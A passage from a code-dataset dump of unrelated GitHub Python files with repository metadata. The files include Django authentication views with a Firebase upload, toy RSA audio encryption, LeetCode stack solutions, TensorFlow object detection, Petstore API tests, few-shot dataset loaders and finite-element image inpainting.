open(filename)\n    kumo_json = json.load(file)\n    account = KumoCloudAccount(None, None, kumo_dict=kumo_json)\n    units = account.get_all_units()\n    print(\"Units: %s\" % str(units))\n    for unit in units:\n        print(\"Unit %s: address: %s credentials: %s\" %\n              (account.get_name(unit), 
account.get_address(unit),\n account.get_credentials(unit)))\n # Optional script to test fetching data from the units\n # kumos = account.make_pykumos()\n # for kumoName in kumos:\n # if isinstance(kumos[kumoName], PyKumoStation):\n # print(\"Kumo Station Outdoor Temp: %s\" % (kumos[kumoName].get_outdoor_temperature()))\n # else:\n # print(\"Indoor Unit %s Current Temp: %s\" % (kumoName, kumos[kumoName].get_current_temperature()))\n\nif __name__ == '__main__':\n main()\n","repo_name":"dlarrick/pykumo","sub_path":"server_parser.py","file_name":"server_parser.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"29"} +{"seq_id":"9664301695","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.db import IntegrityError\nfrom django.http.response import HttpResponse\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required\n\nfrom pathlib import Path\nimport os\nimport environ\nimport threading\nimport pyrebase\n\nfrom .forms import UserCreationForm, UserMediaDetailsForm\nfrom .models import UserMediaDetails\nfrom . import constants\n\n# Create your views here.\n\n\ndef signup(req):\n if req.method == 'GET':\n return render(req, 'users/signup.html', context={'form': UserCreationForm()})\n else:\n if req.POST['password1'] == req.POST['password2']:\n try:\n user = User.objects.create_user(\n username=req.POST['username'],\n password=req.POST['password1'], \n email=req.POST['email'],\n first_name=req.POST['first_name'],\n last_name=req.POST['last_name'])\n user.save()\n login(req, user)\n return redirect('users:view_profile')\n except IntegrityError:\n return render(req, 'users/signup.html', \n {'form': UserCreationForm(), 'error': constants.USERNAME_TAKEN})\n else:\n return render(req, 'users/signup.html', \n {'form': UserCreationForm(), 'error': constants.PASSWORDS_DONT_MATCH})\n\n\ndef signin(req):\n if req.method == 'GET':\n return render(req, 'users/signin.html', {'form': AuthenticationForm()})\n else:\n user = authenticate(req, username=req.POST['username'], password=req.POST['password'])\n if user is None:\n return render(req, 'users/signin.html', \n {'form': AuthenticationForm(), 'error': constants.LOGIN_FAIL})\n else:\n login(req, user)\n return redirect('users:view_profile')\n\n@login_required\ndef logoutuser(req):\n if req.method == 'POST':\n logout(req)\n return redirect('landing')\n\n@login_required\ndef view_profile(req):\n if req.method == 'GET':\n target_user_details = UserMediaDetails.objects.filter(user_id=req.user.id)\n\n img_url = None\n \n if len(target_user_details) > 0:\n img_url = target_user_details[0].uploaded_image.url\n return render(req, 'users/profile.html', {'form': UserMediaDetailsForm(instance=target_user_details[0]), 'img_url': img_url})\n\n return render(req, 'users/profile.html', {'form': UserMediaDetailsForm(), 'img_url': img_url})\n else:\n form = UserMediaDetailsForm(req.POST, req.FILES)\n if form.is_valid():\n user_details = form.save(commit=False)\n user_details.user_id = req.user\n\n user_details.save()\n\n firebase_image_storage(req.user.username, user_details.uploaded_image.url, req.user.id)\n\n return redirect(reverse('users:view_profile'))\n else:\n return render(req, 'users/profile.html', \n {'form': UserMediaDetailsForm(), 'error' : 'Form data 
invalid'})\n\n\ndef firebase_image_storage(user_name, file_path, pk):\n    thread_task = threading.Thread(target=firebase_image_storage_helper, args=[file_path, user_name, pk])\n    thread_task.daemon = True  # setDaemon() is deprecated in favour of the daemon attribute\n    thread_task.start()\n\n\ndef firebase_image_storage_helper(file_path, user_name, pk):\n    env = environ.Env()\n    environ.Env.read_env()\n\n    firebase = pyrebase.initialize_app({\n        \"apiKey\": env('API_KEY'),\n        \"authDomain\": env('AUTH_DOMAIN'),\n        \"projectId\": env('PROJECT_ID'),\n        \"storageBucket\": env('STORAGE_BUCKET'),\n        \"messagingSenderId\": env('MESSAGING_SENDER_ID'),\n        \"appId\": env('APP_ID'),\n        \"measurementId\": env('MEASUREMENT_ID'),\n        \"databaseURL\": \"\"\n    })\n    storage = firebase.storage()\n    BASE_DIR = str(os.path.dirname(os.path.realpath(__file__)))\n    BASE_DIR = BASE_DIR[:BASE_DIR.rfind('\\\\')]\n    file_path = str(file_path).replace('/', '\\\\')\n    full_path = BASE_DIR + file_path\n\n    rvalue = storage.child(f\"profile_images/{user_name}.jpg\").put(full_path)\n\n    download_link = f\"{env('DOWNLOAD_BASE_URL')}{user_name}.jpg?alt=media&token={rvalue['downloadTokens']}\"\n\n    print('the download link is', download_link)\n\n    user_details = UserMediaDetails.objects.filter(user_id=pk)[0]\n    user_details.image_url = download_link\n    user_details.save()","repo_name":"Kartik2301/Recurrence","sub_path":"Backend/tripper/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20255237959","text":"import math\nimport random\nfrom scipy.io import wavfile\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sounddevice as sd\n\nfs, data = wavfile.read('utkarsh_audio.wav')\nplt.plot(data) # fs = sampling frequency = 44.1kHz\nplt.title(\"Original Audio Plot\")\ndata_1 = np.asarray(data, dtype = np.int32)\n\np1 = int(input(\"Enter a prime number: \"))\np2 = int(input(\"Enter another prime number: \"))\n\nn = p1*p2\nphi = (p1-1)*(p2-1)\n\ndef generate_e(phi):\n    possible_e_values = []\n    for i in range(2, phi):\n        if math.gcd(i, phi) == 1:\n            e = i\n            possible_e_values.append(e)\n    return random.choice(possible_e_values)\n\ne = generate_e(phi)\n\ndef gcdExtended(E,t):\n    a1,a2,b1,b2,d1,d2=1,0,0,1,t,E\n\n    while d2!=1:\n\n        # k\n        k=(d1//d2)\n\n        #a\n        temp=a2\n        a2=a1-(a2*k)\n        a1=temp\n\n        #b\n        temp=b2\n        b2=b1-(b2*k)\n        b1=temp\n\n        #d\n        temp=d2\n        d2=d1-(d2*k)\n        d1=temp\n\n    D=b2\n\n    if D>t:\n        D=D%t\n    elif D<0:\n        D=D+t\n\n    return D\n\n\nd=gcdExtended(e,phi)\nprint(d)\n\npublic_key = n,e\nprivate_key = n,d\n\nprint(\"Public Key = \", public_key)\nprint(\"Private Key = \",private_key)\n\n\"\"\"## Encryption of audio file\"\"\"\n\n# Use modular exponentiation per sample (assumes a mono signal);\n# data**e would overflow fixed-width integer arrays\nencrypted = np.array([pow(int(v), e, n) for v in data])\nplt.plot(encrypted)\nplt.title(\"Encrypted Audio Plot\")\n\nencrypted = np.asarray(encrypted, dtype=np.int16)  # note: n must fit in int16 for this save to be lossless\nwavfile.write('encrypted_rsa.wav', fs, encrypted)\n#print(\"A file titled 'encrypted_rsa.wav' is generated which is the encrypted audio to be communicated\")\n\n\"\"\"## Loading and decrypting\"\"\"\n\nfs, Data = wavfile.read('encrypted_rsa.wav')\nplt.plot(Data)\nplt.title(\"Encrypted Audio Plot\")\n\n\"\"\"## Decryption of data\"\"\"\n\ndecrypted = np.array([pow(int(v), d, n) for v in Data])\nplt.plot(decrypted)\nplt.title('Decrypted Audio Plot')\n\n","repo_name":"Rattin99/Security_project_back","sub_path":"rsa_audio_final.py","file_name":"rsa_audio_final.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20930850372","text":"import csv\nimport 
numpy as np\nfrom itertools import chain, combinations\n\nMAX_COMBO = 5\n\n\ndef powerset(iterable):\n    s = list(iterable)\n    return chain.from_iterable(combinations(s, r) for r in range(MAX_COMBO+1))\n\n\n# Load the data\nsource = []\nsource_value = []\nsource_title = []\n\ntarget = []\ntarget_value = []\ntarget_title = []\n\nwith open(\"source_cutting.csv\", encoding=\"utf-8\") as source_file:\n    rows = csv.reader(source_file, delimiter=\",\")\n    for row in rows:\n        source.append(row)\n    source.pop(0)\n    source = sorted(source, key=lambda x: x[1])\n    source = np.array(source)\n\nwith open(\"target_cutting.csv\", encoding=\"utf-8\") as source_file:\n    rows = csv.reader(source_file, delimiter=\",\")\n    for row in rows:\n        target.append(row)\n    target.pop(0)\n    target = sorted(target, key=lambda x: x[1])\n    target = np.array(target)\n\n# Convert the data (split columns, string -> number)\nsource_title = source.T[0]\nsource_value = source.T[1].astype(\"int\")\ntarget_title = target.T[0]\ntarget_value = target.T[1].astype(\"int\")\n\nfor i, goal in enumerate(target_value, 1):\n    used_source = source_value[source_value <= goal]\n    print(\"============ {}/{} ============\".format(i, len(target_value)))\n    print(\"target : {}\".format(goal))\n    print(\"source : {}/{}\".format(len(used_source), len(source_value)))\n\n    counter = 0\n    for j, combo in enumerate(powerset(used_source), 1):  # j avoids shadowing the outer loop index\n        result = sum(combo)\n        if result == goal:\n            counter += 1\n            # print(\"#{:5d} {}\".format(j, combo))\n    print(\"total {} found!\".format(counter))\n    # break","repo_name":"JungWinter/study","sub_path":"Python/Misc/subset_sum/subset_sum_2.py","file_name":"subset_sum_2.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"29"} +{"seq_id":"5975701135","text":"from typing import List  # needed for the List[int] annotations used below\n\n\ndef monotonicStack(nums):\n    n = len(nums)\n    stack = []\n    \n    for i in range(n):\n        while len(stack) > 0 and stack[-1] >= nums[i]:\n            stack.pop()\n        \n        stack.append(nums[i])\n    \n    return stack\n\n\nnums = [2, 3, 7, 24, 4, 6, 19]\nprint(monotonicStack(nums))\n\nclass Solution:\n    def dailyTemperatures(self, temp):\n        st = []\n        n = len(temp)\n        answer = [0] * n\n\n        for i in range(n):\n            while st and temp[st[-1]] < temp[i]:\n                print(\"stack\", st, \"i\", i)\n                answer[st[-1]] = i - st[-1]\n                print(\"answer\", answer)\n                st.pop()\n            st.append(i)\n        return answer\n    \ns = Solution()\nprint(s.dailyTemperatures(nums))\n\n# Monotonic Stack\n\n# # naive Solution: time out for some cases\n\n# class Solution:\n#     def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n#         if len(temperatures) == 1:\n#             return [0]\n#         res = []\n#         i = 0\n#         for i in range(len(temperatures)):\n#             interval = 1\n#             j = i+1\n            # while j < len(temperatures) and temperatures[j] <= temperatures[i]:\n            #     j += 1\n            #     interval +=1\n            \n            # if j == len(temperatures):\n            #     res.append(0)\n            # else:\n            #     # print(res)\n            #     res.append(interval)\n            # return res\n\n\n# solution 2\n# class Solution:\n#     def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n#         res = [0] * len(temperatures)\n#         stack = []\n#         for index, temp in enumerate(temperatures):\n#             while stack and temperatures[stack[-1]] < temp:\n#                 prev_day = stack.pop()\n#                 res[prev_day] = index - prev_day\n#             stack.append(index)\n#         return res\n\nclass Solution:\n    def dailyTemperatures(self, temp: List[int]) -> List[int]:\n        stack = []\n        res = [0] * len(temp)\n        for i in range(len(temp)):\n            while stack and temp[stack[-1]] < temp[i]:\n                res[stack[-1]] = i - stack[-1]\n                stack.pop()\n            stack.append(i)\n        return res\n# time complexity: O(N): each element 
can only be added to the stack once, which means the stack is limited to NNN pops. \n\n# Space complexity: O(N): If the input was non-increasing, then no element would ever be popped from the stack, and the stack would grow to a size of N elements at the end.\n\n# Note: answer does not count towards the space complexity because space used for the output format does not count.\n","repo_name":"huifeng248/coding_problem_practice","sub_path":"Leetcode/739_monotonic_stack.py","file_name":"739_monotonic_stack.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5072810792","text":"######## Image Object Detection Using Tensorflow-trained Classifier #########\r\n#\r\n# Author: Evan Juras\r\n# Date: 1/15/18\r\n# Description: \r\n# This program uses a TensorFlow-trained classifier to perform object detection.\r\n# It loads the classifier uses it to perform object detection on an image.\r\n# It draws boxes and scores around the objects of interest in the image.\r\n\r\n## Some of the code is copied from Google's example at\r\n## https://github.com/tensorflow/models/blob/master/research/object_detection/object_detection_tutorial.ipynb\r\n\r\n## and some is copied from Dat Tran's example at\r\n## https://github.com/datitran/object_detector_app/blob/master/object_detection_app.py\r\n\r\n## but I changed it to make it more understandable to me.\r\n\r\n# Import packages\r\nimport os\r\nimport cv2\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport sys\r\nfrom operator import itemgetter\r\nimport csv\r\n\r\n\r\n# This is needed since the notebook is stored in the object_detection folder.\r\nsys.path.append(\"..\")\r\n\r\n# Import utilites\r\nfrom utils import label_map_util\r\nfrom utils import visualization_utils as vis_util\r\n\r\n# Name of the directory containing the object detection module we're using\r\nMODEL_NAME = 'inference_graph'\r\n\r\n# Grab path to current working directory\r\nCWD_PATH = os.getcwd()\r\n\r\n# Path to frozen detection graph .pb file, which contains the model that is used\r\n# for object detection.\r\nPATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,'frozen_inference_graph.pb')\r\n\r\n# Path to label map file\r\nPATH_TO_LABELS = os.path.join(CWD_PATH,'training','labelmap.pbtxt')\r\n\r\n# Path to image\r\nIMAGE_FOLDER = 'target_images'\r\nPATH_TO_IMAGE = os.path.join(CWD_PATH,IMAGE_FOLDER)\r\n\r\n# Number of classes the object detector can identify\r\nNUM_CLASSES = 6\r\n\r\n# Load the label map.\r\n# Label maps map indices to category names, so that when our convolution\r\n# network predicts `5`, we know that this corresponds to `king`.\r\n# Here we use internal utility functions, but anything that returns a\r\n# dictionary mapping integers to appropriate string labels would be fine\r\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\r\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\r\ncategory_index = label_map_util.create_category_index(categories)\r\ncategory_name = [categories[i]['name'] for i in range(len(categories))]\r\nempty_list = [\"image\"]\r\ncategory_name_header = empty_list + category_name\r\n\r\n\r\n# Load the Tensorflow model into memory.\r\ndetection_graph = tf.Graph()\r\nwith detection_graph.as_default():\r\n od_graph_def = tf.GraphDef()\r\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\r\n serialized_graph = fid.read()\r\n 
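# (added) ParseFromString deserializes the frozen-graph bytes read above\r\n    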
od_graph_def.ParseFromString(serialized_graph)\r\n tf.import_graph_def(od_graph_def, name='')\r\n\r\n sess = tf.Session(graph=detection_graph)\r\n\r\n# Define input and output tensors (i.e. data) for the object detection classifier\r\n\r\n# Input tensor is the image\r\nimage_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\r\n\r\n# Output tensors are the detection boxes, scores, and classes\r\n# Each box represents a part of the image where a particular object was detected\r\ndetection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\r\n\r\n# Each score represents level of confidence for each of the objects.\r\n# The score is shown on the result image, together with the class label.\r\ndetection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\r\ndetection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\r\n\r\n# Number of objects detected\r\nnum_detections = detection_graph.get_tensor_by_name('num_detections:0')\r\n\r\n# Minimum score threshold for a box to be visualized \r\nMIN_SCORE = 0.80\r\n\r\n# Export the detected objects to csv --- --- --- --- --- --- --- --- --- --- --- ---\r\n\r\n# Create function that outputs detected objects to csv\r\ndef export_object_csv(filename):\r\n\r\n # Get an image in the folder\r\n image_directory = os.path.join(PATH_TO_IMAGE,filename)\r\n image = cv2.imread(image_directory)\r\n image_expanded = np.expand_dims(image, axis=0)\r\n\r\n # Perform the actual detection by running the model with the image as input\r\n (boxes, scores, classes, num) = sess.run(\r\n [detection_boxes, detection_scores, detection_classes, num_detections],\r\n feed_dict={image_tensor: image_expanded})\r\n\r\n # Export detectd categories to csv\r\n detected_index = [ n for n,i in enumerate(np.squeeze(scores)) if i>MIN_SCORE ]\r\n detected_class = itemgetter(*detected_index)(np.squeeze(classes).astype(np.int32))\r\n \r\n # If the image contains only one object, need to convert int to tuple\r\n if type(detected_class) is not tuple:\r\n detected_class = (detected_class,)\r\n\r\n detected_category = [category_index[x]['name'] for x in detected_class]\r\n print(detected_category)\r\n\r\n # Create a row that shows how many objets are in the image\r\n objects_count = [detected_category.count(category_name[i]) for i in range(len(category_name))]\r\n detected_objects_row = [filename] + objects_count\r\n\r\n with open('detected_object.csv', 'a') as output_csvfile:\r\n output_csvfile_writer = csv.writer(output_csvfile)\r\n output_csvfile_writer.writerow(detected_objects_row)\r\n\r\n# Create a new empty detected_object.csv\r\nwith open(\"detected_object.csv\", \"w\") as output_csv:\r\n writer = csv.writer(output_csv)\r\n writer.writerow(category_name_header)\r\n\r\n# Run export_object_csv for each image in the folder\r\nfor filename in os.listdir(PATH_TO_IMAGE):\r\n if not filename.startswith('.') and os.path.isfile(os.path.join(PATH_TO_IMAGE, filename)):\r\n export_object_csv(filename)\r\n\r\n\r\n\r\n# Draw the results on images --- --- --- --- --- --- --- --- --- --- --- --- --- ---\r\n\r\n# Draw the results of the detection (aka 'visulaize the results')\r\n\r\n# vis_util.visualize_boxes_and_labels_on_image_array(\r\n# image,\r\n# np.squeeze(boxes),\r\n# np.squeeze(classes).astype(np.int32),\r\n# np.squeeze(scores),\r\n# category_index,\r\n# use_normalized_coordinates=True,\r\n# line_thickness=8,\r\n# min_score_thresh=MIN_SCORE)\r\n\r\n# All the results have been drawn on image. 
Now display the image.\r\n# cv2.imshow('Object detector', image)\r\n\r\n# Press any key to close the image\r\n# cv2.waitKey(0)\r\n\r\n# Clean up\r\n# cv2.destroyAllWindows()\r\n","repo_name":"soma11soma11/object_detection","sub_path":"Object_detection_image.py","file_name":"Object_detection_image.py","file_ext":"py","file_size_in_byte":6328,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"70703493838","text":"import json\nimport allure\nfrom requests import Response\nfrom Utils.Cheking import Checking\nfrom Utils.api import Swagger_petshop_api\n\"\"\"Create, update, and delete a new pet\"\"\"\n@allure.epic(\"Test petstore\")\nclass Test_create_pet():\n    @allure.description(\"Test create, update, delete new pet\")\n    def test_add_new_pet(self):\n\n        print(\" POST method\")\n        result_post: Response = Swagger_petshop_api.add_new_pet()\n        check_post = result_post.json()\n        id = check_post.get(\"id\")\n        token=json.loads(result_post.text)\n        print(list(token))\n        Checking.check_status_code(result_post, 200)\n        Checking.check_json_token(result_post, ['id', 'category', 'name', 'photoUrls', 'tags', 'status'])\n        Checking.check_json_value(result_post, 'status', 'available')\n\n        print(\" GET method (after POST)\")\n        result_get: Response = Swagger_petshop_api.get_add_pet(id)\n        Checking.check_status_code(result_get, 200)\n        token = json.loads(result_get.text)\n        print(list(token))\n        Checking.check_json_token(result_get, ['id', 'category', 'name', 'photoUrls', 'tags', 'status'])\n        Checking.check_json_value(result_get, 'status', 'available')\n        Checking.check_json_value(result_get, 'name', 'doggie')\n\n        print(\" PUT method\")\n        result_put: Response = Swagger_petshop_api.put_add_pet(id)\n        token = json.loads(result_put.text)\n        print(list(token))\n        Checking.check_status_code(result_put, 200)\n        Checking.check_json_token(result_put, ['id', 'category', 'name', 'photoUrls', 'tags', 'status'])\n        Checking.check_json_value(result_put, 'name', 'doggie')\n        Checking.check_json_value(result_put, 'status', 'pending')\n\n        print(\" GET method (after PUT)\")\n        result_get: Response = Swagger_petshop_api.get_add_pet(id)\n        Checking.check_status_code(result_get, 200)\n        Checking.check_json_token(result_get, ['id', 'category', 'name', 'photoUrls', 'tags', 'status'])\n        Checking.check_json_value(result_get, 'status', 'pending')\n\n        print(\" DELETE method\")\n        result_delete: Response = Swagger_petshop_api.delete_new_pet(id)\n        Checking.check_status_code(result_delete, 200)\n        token = json.loads(result_delete.text)\n        print(list(token))\n        Checking.check_json_token(result_delete, ['code', 'type', 'message'])\n        Checking.check_json_value(result_delete, 'type', 'unknown')\n\n        print(\" GET method (after DELETE)\")\n        result_get: Response = Swagger_petshop_api.get_add_pet(id)\n        Checking.check_status_code(result_get, 404)\n        token = json.loads(result_get.text)\n        print(list(token))\n        Checking.check_json_token(result_get, ['code', 'type', 'message'])\n        Checking.check_json_search_word_in_value(result_get, 'message', 'Pet not found')\n\n        print(\"Creating, updating, and deleting the new pet was tested successfully\")","repo_name":"Offersa/test_swagger_petshop","sub_path":"Tests/test_swagger_petshop.py","file_name":"test_swagger_petshop.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"70386939280","text":"import os\nimport pandas as pd\n\nfrom torchvision.datasets import ImageFolder\n\nfrom .datasets import 
register\n\n\n@register('mini_imagenet')\nclass MiniImageNet:\n \"\"\"\n data structure of 'mini-imagenet':\n -| miniImageNet\n ---| images\n -----| n0153282900000005.jpg\n -----| n0153282900000006.jpg\n -----| n0153282900000007.jpg\n -----| ...\n ---| labels\n -----| fold0_train.csv\n -----| fold0_val.csv\n -----| ...\n ---| train.csv\n ---| val.csv\n ---| test.csv\n \"\"\"\n def __init__(self, data_path, split='train', fold=-1):\n super(MiniImageNet, self).__init__()\n self.data = []\n self.label = []\n if fold != -1:\n data_split = os.path.join(data_path, 'labels')\n data_split += '/fold' + str(fold) + '_' + split + '.csv'\n else: \n data_split = data_path + '/' + split + '.csv'\n data_list = pd.read_csv(data_split)\n data_list = data_list.values.tolist()\n\n for d in data_list:\n img = os.path.join(data_path, 'images', d[0]) # image path\n self.data.append(img)\n self.label.append(d[1])\n self.label_idx = convertLabel(self.label) # convert string label to index\n \n def getLabel(self):\n self.label_str = idx2label(self.label)\n return self.label_str\n\n def getData(self):\n return self.data, self.label_idx # return data/label path list\n\n\n@register('tiered_imagenet')\nclass TieredImageNet:\n \"\"\"\n data structure of 'tiered-imagenet':\n -| tieredImageNet\n ---| train\n -----| n01530575\n -------| n0153057500000001.jpg\n -------| ...\n -----| n01531178\n -------| ...\n ---| val\n ---| test\n ---| train.csv\n ---| val.csv\n ---| test.csv\n \"\"\"\n def __init__(self, data_path, split='train', fold=-1):\n super(TieredImageNet, self).__init__()\n self.data = []\n self.label = []\n \n data_split = data_path + '/' + split + '.csv'\n data_list = pd.read_csv(data_split)\n data_list = data_list.values.tolist()\n\n for d in data_list:\n img = os.path.join(data_path, split, d[1], d[0]) # image path\n self.data.append(img)\n self.label.append(d[1])\n self.label_idx = convertLabel(self.label) # convert string label to index\n \n def getLabel(self):\n self.label_str = idx2label(self.label)\n return self.label_str\n\n def getData(self):\n return self.data, self.label_idx # return data/label path list\n\n\n@register('omniglot')\nclass Omniglot:\n \"\"\"\n data structure of 'omniglot':\n -| Omniglot\n ---| Alphabet_of_the_Magi (super-class 1)\n -----| character01\n -------| 0709_01.png\n -------| 0709_02.png\n -------| ...\n -----| character02\n -----| ...\n ---| Angelic (super-class 2)\n -------| ...\n \"\"\"\n def __init__(self, data_path, split='train', fold=-1):\n super(Omniglot, self).__init__()\n self.data = []\n self.label = []\n\n data_cls_split = data_path + '/' + split + '.csv'\n data_cls_list = pd.read_csv(data_cls_split)\n data_cls_list = data_cls_list.values.tolist()\n\n for d in data_cls_list:\n img_path = os.path.join(data_path, 'data', d[0])\n self.data.append(img_path)\n self.label.append(d[1])\n \n self.label_idx = convertLabel(self.label)\n\n def getLabel(self):\n self.label_str = idx2label(self.label)\n return self.label_str\n \n def getData(self):\n return self.data, self.label_idx\n\n\n@register('cub')\nclass CUB2011:\n \"\"\"\n CUB-200-2011, fine-grained classification.\n \"\"\"\n def __init__(self, data_path, split='train'):\n super(CUB2011, self).__init__()\n self.data = []\n self.label = []\n\n data_path = data_path + '/images'\n label_list = os.listdir(data_path)\n for label in label_list:\n images_path = os.path.join(data_path, label)\n images_list = os.listdir(images_path)\n for img in images_list:\n img_path = os.path.join(images_path, img)\n 
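# (added) store the absolute image path; string labels are mapped to indices later\n                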
self.data.append(img_path)\n                self.label.append(label)\n\n        self.label_idx = convertLabel(self.label)\n\n    def getLabel(self):\n        self.label_str = idx2label(self.label)\n        return self.label_str\n    \n    def getData(self):\n        return self.data, self.label_idx\n\n\ndef idx2label(label):\n    label_str = {}\n    num = len(label)\n    k = 0\n    for i in range(num):\n        if i == 0:\n            label_str[i] = label[i]\n        else:\n            if label[i] != label[i-1]:\n                k += 1\n                label_str[k] = label[i]\n    return label_str\n\n\ndef convertLabel(label):\n    norm_label = []\n    num = len(label)\n    k = 0\n    for i in range(num):\n        if i == 0:\n            norm_label.append(k)\n        else:\n            if label[i] != label[i-1]:\n                k += 1\n            norm_label.append(k)\n    return norm_label\n\n\nif __name__ == '__main__':\n    pass\n","repo_name":"yaoyz96/a-met","sub_path":"datasets/datareg.py","file_name":"datareg.py","file_ext":"py","file_size_in_byte":4686,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"34651542381","text":"import numpy as np\nfrom utils import loadImage, saveImage, showImage, discrepancyScore, makeMask\n\n#image = loadImage(\"pictures/128/005.jpeg\", greyscale=False)\n\n#mask = loadImage(\"masks/128/circles.png\")\n\n#originalimage = np.copy(image)\n\ndef isMasked(mask, x, y):\n    if mask[y][x] == 0:\n        return True\n    return False\n\ndef isWithinBounds(x, y, width, height):\n    # fixed: the y lower-bound test was inverted (previously 'y <= 0')\n    if 0 <= x and x < width and 0 <= y and y < height:\n        return True\n    return False\n\ndef FEMLaplace(_image, _mask):\n    #Copy the image\n    newimage = np.copy(_image)\n\n    height = newimage.shape[0]  # shape is (rows, cols) = (height, width)\n    width = newimage.shape[1]\n\n    #Site indexing\n    siteindex = []\n\n    for y in range(0,height):\n        for x in range(0,width):\n            interesting = False\n            \n            if isMasked(_mask, x, y):\n                siteindex.append((x, y))\n\n    #construct stiffness matrix\n    K = np.zeros((len(siteindex),len(siteindex)))\n\n    a=-1/6\n    b=-1/3\n    c=2/3\n\n    for m in range(0,len(siteindex)):\n        for n in range(0, m):\n            x1, y1 = siteindex[m][0], siteindex[m][1]\n            x2, y2 = siteindex[n][0], siteindex[n][1]\n\n            if np.abs(x1-x2) + np.abs(y1-y2) == 1:\n                K[m][n] = 2*a\n\n            if np.abs(x1-x2) == 1 and np.abs(y1-y2) == 1:\n                K[m][n] = b \n\n    K = K+K.transpose()+4*c*np.identity(len(siteindex))\n\n    #Construct force vector\n    f = np.zeros((len(siteindex),1))\n\n    for k in range(0,len(siteindex)):\n        #Find values of neighbouring Dirichlet boundary conditions\n        diagonalsum = 0\n\n        x,y = siteindex[k][0],siteindex[k][1]\n\n        if not isMasked(_mask, x-1,y-1):\n            diagonalsum += newimage[y-1][x-1]\n        if not isMasked(_mask, x-1,y+1):\n            diagonalsum += newimage[y+1][x-1]\n        if not isMasked(_mask, x+1,y-1):\n            diagonalsum += newimage[y-1][x+1]\n        if not isMasked(_mask, x+1,y+1):\n            diagonalsum += newimage[y+1][x+1]\n\n        adjacentsum = 0\n\n        if not isMasked(_mask, x,y+1):\n            adjacentsum += newimage[y+1][x]\n        if not isMasked(_mask, x,y-1):\n            adjacentsum += newimage[y-1][x]\n        if not isMasked(_mask, x+1,y):\n            adjacentsum += newimage[y][x+1]\n        if not isMasked(_mask, x-1,y):\n            adjacentsum += newimage[y][x-1]\n\n        f[k][0] = -(diagonalsum*b+adjacentsum*2*a)\n\n    #Solve system for the 'displacement vector', i.e. 
the pixel values\n d = np.linalg.solve(K,f)\n\n for k in range(0,len(siteindex)):\n x, y = siteindex[k][0], siteindex[k][1]\n newimage[y][x] = d[k]\n\n return newimage\n\n#restoredimageR = FEMLaplace(image[:,:,0], mask)\n#restoredimageG = FEMLaplace(image[:,:,1], mask)\n#restoredimageB = FEMLaplace(image[:,:,2], mask)\n\n#restoredimage = np.dstack([restoredimageR,restoredimageG,restoredimageB])\n\n#showImage(np.concatenate([originalimage,np.dstack([mask,mask,mask]).astype(np.uint8),restoredimage],axis=1))\n\n#DSMask = makeMask(\"masks/128/circles.png\") #Need the mask site index list\n#scoreR = discrepancyScore(originalimage[:,:,0], restoredimageR, DSMask[1])\n#scoreG = discrepancyScore(originalimage[:,:,1], restoredimageG, DSMask[1])\n#scoreB = discrepancyScore(originalimage[:,:,2], restoredimageB, DSMask[1])\n\n\n#scoreTot = (scoreR + scoreG + scoreB)/3\n#print(\"Average discrepancy score = \" + str(scoreTot))\n\n\n","repo_name":"Aquila042/ImageRestoration","sub_path":"FEM.py","file_name":"FEM.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40896232121","text":"import pandas as pd\nfrom collections import Counter\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\nfrom transformers import LayoutLMv2ForTokenClassification, AdamW\nfrom transformers import LayoutLMv2Processor\nimport torch\nfrom tqdm.notebook import tqdm\nfrom os import listdir\nfrom PIL import Image\nimport json\nfrom seqeval.metrics import (\n classification_report,\n f1_score,\n precision_score,\n recall_score)\nfrom data_loader import Data_Loader\n\nreplacing_labels = {'chxh_2_en':'O','key_ngon_tro_trai_en':'O','key_ngon_tro_phai_en':'O','value_nguoi_cap':'O','key_ngon_tro_trai':'O','cnxh_1_en': 'O','chxh_1_en':'O','ignore_1_en': 'O', 'ignore_2_en':'O', 'noi_cap_1':'O', 'noi_cap_2': 'O', 'driver_license_bo_gtvt_1': 'O', 'driver_license_bo_gtvt_2': 'O', 'dau_vet_1': 'dau_vet', 'dau_vet_2': 'dau_vet', 'ignore_1': 'O', 'ignore_2': 'O', 'chxh_1': 'O', 'chxh_2': 'O', 'key_ho_ten_khac':'O', 'level_nguoi_cap_1': 'O', 'level_nguoi_cap_2': 'O', 'key_hang_cap': 'O', 'nguoi_cap': 'O', 'hang_cap': 'O','van_tay_phai':'O','van_tay_trai':'O'}\n\n\nprocessor = 